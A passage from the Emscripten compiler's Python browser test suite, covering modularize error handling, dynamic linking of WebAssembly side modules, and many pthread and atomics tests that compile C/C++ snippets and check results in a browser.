browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', '-s', 'EXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-s', 'SIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-s', 'MAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-s', 'SIDE_MODULE', '-s', 'USE_PTHREADS', '-Wno-experimental'])
# Attempt to use dlopen the side module (without preloading) should fail on the main thread
# since the syncronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-s', 'MAIN_MODULE=2'])
# But with PROXY_TO_PTHEAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-s', 'MAIN_MODULE=2', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-Wno-experimental'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-O2', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'])
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
